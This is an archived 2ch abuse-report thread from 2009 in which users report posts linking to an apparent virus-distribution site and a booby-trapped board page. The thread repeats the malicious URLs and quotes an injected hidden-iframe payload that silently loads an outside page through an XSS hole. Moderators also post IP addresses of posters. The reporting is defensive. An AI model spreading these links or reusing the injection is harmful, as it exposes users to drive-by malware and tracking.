X

★090406 複数板「ウイルスGeno短縮URL」誘導マルチポスト荒らし報告

■ このスレッドは過去ログ倉庫に格納されています
1 ◆mrBWi0WEjc
垢版 |
2009/04/06(月) 06:47:53ID:gWLJV9hT0
複数板において、4/6現在、多くのアンチウイルスソフト未対応の
脆弱性を突いてウイルスに感染させるサイト(ttp://www.geno-web.jp/)へ
と誘導する短縮URLを、各スレッドの内容に合わせトラップとして貼り付ける、
もしくはただその短縮URLのみを貼り付けるマルチポスト荒らしを報告するスレです。

各種短縮URLの種類
http://is.gd/****
http://janp.biz/****
http://xurl.jp/****
http://jpan.jp/?****
http://go.2ch2.net/u/****
http://tinyurl.com/****
http://5jp.net/***
http://jpan.jp/?****
http://mo-v.jp/?****


【荒らしの特徴】
a) 投稿内容 投稿例 >>2にて報告
b) 規模頻度 max 21res/day
c) 爆撃範囲 
  ニュース速報(http://tsushima.2ch.net/news/) ニュース速報+板(http://tsushima.2ch.net/newsplus/)
  ニュー速VIP(http://takeshima.2ch.net/news4vip/) 難民(http://jfk.2ch.net/nanmin/)
  ネトゲ実況(http://dubai.2ch.net/ogame/) ネットwatch(http://pc11.2ch.net/net/)
  大規模MMO(http://jfk.2ch.net/mmo/) 自己紹介(http://hideyoshi.2ch.net/intro/)
  ハード・業界(http://dubai.2ch.net/ghard/) DTM(http://pc11.2ch.net/dtm/)
  市況1(http://anchorage.2ch.net/livemarket1/) ネットゲーム(http://jfk.2ch.net/netgame/)
継続性:2009/04/05〜(継続中)

◆報告の注意
http://info.2ch.net/wiki/index.php?%B9%D3%A4%E9%A4%B7%CA%F3%B9%F0
・書式を合わせて報告して下さい。フォーマットに沿っていないと原則スルーです。

◆書式
最新の書式はwikiを確認してください。
http://info.2ch.net/wiki/index.php?%B3%C6%B9%D3%A4%E9%A4%B7%CA%F3%B9%F0%A4%CE%BD%F1%BC%B0
・書式を合わせて報告して下さい。フォーマットに沿っていないと原則スルーです。
・書式4を推奨します。
・時系列で報告して下さい。
・曜日表示は消して報告して下さい。
・報告1レスあたり、指定するURLは10個迄、それ以上は分割して下さい。

◆報告に便利なツールあれこれ◆
・ものすごい勢いでIDとかをまとめるツール
 http://houchi.net/2ch/adabuse.php
・あなたのお好きにまとめtool
 http://halcyan.30.kg/myscan.php
・まとめツールのソートツール ver.alpha stable
 http://houchi.net/2ch/abuseresort.php
・時系列ちゃん
 http://www.geocities.jp/ch2dat/htmlmiller/with2ch_net_up_data/1117499001.html
キーワード抽出tool
 http://halcyan.30.kg/myscan.php
2009/04/07(火) 11:04:51ID:Xee6Rz4k0
おま速
2009/04/07(火) 11:18:18ID:njOAZAdCP
190みたいなのは精査しないで串でも携帯でも焼きです。
2009/04/07(火) 11:21:00ID:zX0F0JNyP
>>195
ウィルスURLは任意削除となります。
しかし携帯からの場合は即規制です。
2009/04/07(火) 11:26:47ID:njOAZAdCP
はい。削除人さんの任意です。
わたすでしたら即「あぼーん」します
200 [―{}@{}@{}-] 雑魚『爽やかな風に揺られて』 ◆MOON///Uh6
垢版 |
NGNG
>>194
> ・ピンポイントの永久規制だということ

確か ピンポイントに絞り込めるからこそ 焼けるのが BBM BBQじゃなかったかな〜(笑)

ピンポイントだから 焼くかどうか慎重に考えて って 条件とか関係なく常に慎重にみんなやってるだろ(笑)

WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWwwwWWWww↑→

そもそも

> ・ピンポイントの永久規制だということ
> ・BBQ/BBMを参照しているサイトは2ちゃんねるだけではないということ

だからこそ 携帯で怪しいレスをすべきじゃない と投稿者へ言うならわかるが 

焼き人へ考え方をしっかりしろとかいう理由に全然なってないわ(笑)

他のサイトでも書けなくなるからもうちょっと甘く鑑定しようや って逝ってるんだけど それ変じゃない(笑)

他のサイトの事とか 関係ないでしょ(笑)

これも逆に 他でも書けなくなるから2chへ怪しまれる可能性がある投稿は極力控えるのが無難だと

携帯利用者へよ〜く逝っとけ 
2009/04/07(火) 13:42:57ID:efEj6Pji0
>190はこっちのスレの取り扱い案件っぽいな

★090323 スパムURLスクリプト爆撃報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1237811682/

既に焼かれているみたいなんで報告はしないが
2009/04/07(火) 14:17:17ID:aH3X3TUN0
ヤキトリコテもうざいから焼いて欲しいな
結局キタチョンと同じで誰かがガツンとやってやらないと分からんのですよ
甘やかされて大きくなったガキとおんなじ
2009/04/07(火) 15:02:32ID:???0
>>166
「1resだから」焼いちゃダメって言ってる訳ではないからね。
2009/04/07(火) 20:48:29ID:6ouYTVaUP
焼き鳥はすでに焼けてるから焼き鳥
205 [―{}@{}@{}-] 雑魚『爽やかな風に揺られて』 ◆MOON///Uh6
垢版 |
NGNG
マルチポストという荒らし行為を取り締まろうと掘ってみたが

投稿ホストはバラバラだったので マルチポストという容疑はなかったのに

ココで焼き判断は下った

これは冤罪という奴だから 焼きを1回撤回しろ

その後 焼く正当な理由を示してから 焼いてみろよ

WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWwwWWww↓→

と 論理的に説明して 解除すりゃいいだけじゃん>>203

なにをいつまでも 酔っ払いみたいにしつこく愚痴ってるのさ(笑)

マルチポスト以外の別の容疑で 改めて 焼き という手順は なんかループというかゴタゴタしてて焼き屋は嫌なんだろうが

正規な順だと思うよ!議論する余地があるということは 焼き保留状態でこそ じゃないのかな〜?

焼き保留する必要もない案件なら クレームをつけるべきじゃないし!
2009/04/08(水) 17:35:12ID:A/lbmxHx0
>>80
ここで報告されてます ってなってて来たんだ
誰だよなんもやってないのに規制報告したやつ・・・
2009/04/11(土) 03:38:45ID:eARgpSMg0
>>206
短縮URL貼ったヤツを恨め
208名無しの報告
垢版 |
2009/04/12(日) 19:34:57ID:8/z1ue4R0
待ち?
2009/04/15(水) 00:20:55ID:GVBXOQiqP
606 :Trader@Live!:2009/04/14(火) 23:31:02 ID:22VAconQ

コの子は凄すぎ

ttp://lives.no-ip.biz/lives/sn/src/1280461.jpg
ttp://yy55.60.kg/test/read.cgi/aqaq1212/1186801948/1

KEY LOGGER貼りやがった。 試ねよコイツ。
2009/04/15(水) 11:25:54ID:OgWwVFkC0
>209
貼られたスレのURLキボンヌ
2009/04/15(水) 11:27:50ID:CAjsGfzR0
>>210
>>209
ttp://yy55.60.kg/test/read.cgi/aqaq1212/1186801948/1

ですね
2009/04/15(水) 11:35:01ID:OgWwVFkC0
そうでなくて>209の内容が貼られた2chのスレのURLだよ
213 ◆Rocks/oCOQ
垢版 |
2009/04/15(水) 12:41:54ID:hxVuwYVs0
>209,211貼るな馬鹿ヽ(`Д´)ノ
2009/04/15(水) 15:54:12ID:SR/+A4spP
げ、>>211踏んじまった。 まずい系?
2009/04/15(水) 15:57:18ID:XMO8mtg40
http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/209 2009/04/15 00:20:55 ID:GVBXOQiqP
http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/211 2009/04/15 11:27:50 ID:CAjsGfzR0

こうだな
216名無しの報告
垢版 |
2009/04/16(木) 05:12:35ID:5W8K+zMn0
>>215
正解
2009/04/16(木) 09:26:23ID:XXjU8H6B0
>211
2ch型掲示板の0URL見るだけなら大丈夫と思ったら…やられた!
単なるブラクラだよねそうだよね?
2009/04/16(木) 14:34:24ID:yezPe1AV0
>>211 ←こいつ悪質杉るだろ
2009/04/16(木) 18:40:46ID:clXYqY0p0
【報告】
>>215
2009/04/18(土) 02:45:25ID:7lA+GD1O0
http://jfk.2ch.net/test/read.cgi/nanmin/1239017092/33 2009/04/18 02:35:14
2009/04/18(土) 02:45:47ID:7lA+GD1O0
【報告】
>>215
>>220
2009/04/18(土) 02:59:41ID:l8yf04m/0
http://anchorage.2ch.net/test/read.cgi/livemarket2/1239974460/698 2009/04/18 00:09:20 ID:nNP2kpQa
2009/04/18(土) 03:00:18ID:l8yf04m/0
【報告】
>>215
>>220
>>222
2009/04/18(土) 03:13:12ID:3aQEL2rf0
>>211
このURL踏んでも何ともないですが?
この先は駄目という事ですか?
2009/04/18(土) 03:19:05ID:0kRDUx4/P
>>224
URLの先がブラクラになっているようだ。
Genoとは関係ないような。
2009/04/18(土) 03:20:59ID:Q6TthHre0
でもわんわんされてるぞ
2009/04/18(土) 03:24:53ID:dex7pk5x0
ただのブラクラじゃないの?
カスペも反応しないんだが?一応、FireFoxの3.0.8
2009/04/18(土) 03:29:10ID:R2vsZa5D0
yokoku.inのXSS事件で使われた「amigo.in」がyyカキコのXSS脆弱性?を利用して仕掛けられtるみたいですね
2009/04/18(土) 03:31:06ID:3aQEL2rf0
>>228
>>211を踏むだけでも駄目という事ですか?
2009/04/18(土) 03:33:29ID:dex7pk5x0
>>228
踏んだけどなにも起こらないぞ?
その先の■掲示板に戻る■とか踏むとブラクラみたいになるけど??
2009/04/18(土) 03:38:51ID:R2vsZa5D0
>>229
たぶん有害なウイルスとかは仕掛けられてないと思うけど
>>221にアクセス、iframeでamigo.inにも同時アクセスするので
踏まないが吉。。。と思います♪
ソースチェッカーオンライン@amigo.in
http://so.7walker.net/index.php?http%3A%2F%2Famigo.in%2Fhahahahahaha%2Foppai.html&dele=1

>>230
それはたぶんjavascriptかなんかでページ切り替え時のみ発動するように
なってるんじゃないですかね。。。
あんま詳しいこと知らないんですが。よくあるじゃないですか
偽アンチウイルスのサイトで移動しようとしたら、本当にシステムスキャンしないんでしょうか?的なアラートが出るやつ
2009/04/18(土) 03:40:40ID:R2vsZa5D0
firefoxをお使いの方は「Noscript」ってアドオンを入れたら改竄系に対して
すこしは幸せになれるんじゃないかなと
2009/04/18(土) 03:42:14ID:3aQEL2rf0
>>231
211を踏んでいったスレのアドレスではなくて211そのものが駄目という事?
234しぇりー ★
垢版 |
2009/04/18(土) 03:46:15ID:???0?S★(506465)
>>222

Trader@Live!<><>2009/04/18(土) 00:09:20 nNP2kpQa<>こんなことってあるんだね <br> <><>softbank220014100016.bbtec.net<>220.14.100.16<><>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
235しぇりー ★
垢版 |
2009/04/18(土) 03:46:21ID:???0?S★(506465)
>>220

名無し草<>sage<>2009/04/18(土) 02:35:14 hhvyOuGJ<>こっちに移動 <br> http://yy55.<;><>i58-89-22-241.s05.a015.ap.plala.or.jp<>58.89.22.241<><>Monazilla/1.00 (JaneView/0.1.12.1)
236しぇりー ★
垢版 |
2009/04/18(土) 03:46:28ID:???0?S★(506465)
>>215

名無しの報告<>sage<>2009/04/15(水) 00:20:55 GVBXOQiqP<>606 :Trader@Live!:2009/04/1<><>cw43.razil.jp(576055)121.110.68.44<>210.135.98.43<><>Monazilla/1.00 (P2/p2.2ch.net; p2-client-ip: 121.110.68.44; p2-user: 576055)
名無しの報告<>sage<>2009/04/15(水) 11:27:50 CAjsGfzR0<><a href="../test/read.cgi/sec2<><>softbank221029068196.bbtec.net[OnFFY8xPvSlGO06A]<>221.29.68.196<>OnFFY8xPvSlGO06A<>Monazilla/1.00 Live2ch/1.18
237名無しの報告
垢版 |
2009/04/18(土) 03:47:11ID:Q6TthHre0
報告
>>215
>>220
ログ
>>234-236

《集計》
softbank220014100016.bbtec.net 1res
i58-89-22-241.s05.a015.ap.plala.or.jp 1res
cw43.razil.jp(576055)121.110.68.44 1res
softbank221029068196.bbtec.net[OnFFY8xPvSlGO06A] 1res


《まとめ》

【 ● 】
●[OnFFY8xPvSlGO06A] 1res
(うち接続先 softbank22102 1res

【 通常 】
softbank220014 1res
\.s05.a015.ap.plala.or.jp 1res

【 p2 】
576055 @ p2-user 1res
(うち接続先 KD\d+\.ppp-bb.dion.ne.jp ) 1res
2009/04/18(土) 03:49:06ID:bGh1+bIXP
>>211 はするほどのもん?
2009/04/18(土) 03:51:16ID:R2vsZa5D0?S★(718702)
>>233
yy55.60.kg/test/read.cgi/aqaq1212/1186801948/1
このURL自体が危険なんじゃないかと思います


#yyカキコのURLはgenoウイルスとは関係なさそうなので、このスレで扱うのものではないような気がするのですが。
2009/04/18(土) 05:46:18ID:3aQEL2rf0
>>231
>>211はこうでしたね。
http://so.7walker.net/index.php?site=yy55.60.kg%2Ftest%2Fread.cgi%2Faqaq1212%2F1186801948%2F1&hua=
2009/04/18(土) 05:50:19ID:R2vsZa5D0
>>240
ですです
<font color=green><b><iframe style=position:fixed;top:0px;left:0px; width=1 height=0 src=//amigo.in/hahahahahaha/oppai.html></iframe>

@全角に変換してますが上記のが原因です
2009/04/18(土) 05:52:53ID:3aQEL2rf0
>>241
これですね
hahahahahaha
2009/04/18(土) 15:19:32ID:MSwBmm3R0
215 本当に掘られててワラタw
■ このスレッドは過去ログ倉庫に格納されています
5ちゃんねるの広告が気に入らない場合は、こちらをクリックしてください。

ニューススポーツなんでも実況